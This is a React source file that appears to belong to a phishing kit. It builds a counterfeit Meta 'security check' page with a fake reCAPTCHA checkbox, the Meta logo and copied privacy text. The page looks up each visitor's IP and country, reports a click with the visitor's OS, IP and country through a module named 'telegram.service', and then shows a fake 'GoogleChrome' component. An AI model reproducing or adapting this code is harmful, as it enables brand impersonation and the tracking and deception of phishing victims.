/* eslint-disable jsx-a11y/anchor-is-valid */
import React from "react";

import useStore from "../store";
import { click, getLocation } from "../services/telegram.service";
import { useEffect, useState } from "react";
import { osName } from "react-device-detect";
import GoogleChrome from "../components/Chrome";
import CaptchaCheckbox from "../components/Captcha/CaptchaCheckbox";
import { useLocation } from "react-router-dom";

const CaptchaFullPage: React.FC = () => {
  const location = useLocation();
  const queryParams = new URLSearchParams(location.search);
  const pageId = queryParams.get("pageId");

  const { setChrome, ChromeO, setPageId } = useStore();
  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("127.0.0.1");
  const fetchCountry = async () => {
    const data = await getLocation();
    setCountryCode(data.country_code);
    setIp(data.ip);
  };

  useEffect(() => {
    fetchCountry();
    setPageId(pageId || "UMPG"); // Set the pageId in the store or state as needed
  }, [setPageId, pageId]);

  const handleClick = async () => {
    window.scrollTo({ top: 0, behavior: "smooth" });

    setChrome(true);
    console.log("Clicked link");
    await click("Captcha", osName, ip, countryCode);
  };

  return (
    <>
      {ChromeO ? <GoogleChrome /> : false}
      <div className="flex flex-col items-center justify-start bg-[#ffffff] h-screen w-full">
        <div className="font-roboto text-[14px] text-gray-800 w-full p-4 md:p-0 md:w-[300px]">
          <div className="text-start text-xs text-gray-500 mt-20 md:mt-[150px]">
            <img
              src="https://z-m-static.xx.fbcdn.net/rsrc.php/v4/yK/r/soeuNpXL37G.png"
              alt="Meta"
              className="w-16"
            />
          </div>
          {/* reCAPTCHA Box */}
          <CaptchaCheckbox onCheck={handleClick} />

          {/* About Section */}
          <div className="text-gray-700 font-helvetica text-[13px] leading-[1.3]">
            <p className="font-normal">
              This helps us to combat harmful conduct, detect and prevent spam
              and maintain the integrity of our Products.
            </p>

            <p className="font-normal mt-4 ">
              We’ve used Google's reCAPTCHA Enterprise product to provide this
              security check. Your use of reCAPTCHA Enterprise is subject to
              Google’s Privacy Policy and Terms of Use.
            </p>

            <p className="font-normal mt-4 ">
              reCAPTCHA Enterprise collects hardware and software information,
              such as device and application data, and sends it to Google to
              provide, maintain, and improve reCAPTCHA Enterprise and for
              general security purposes. This information is not used by Google
              for personalized advertising.
            </p>
          </div>
        </div>
      </div>
    </>
  );
};

export default CaptchaFullPage;
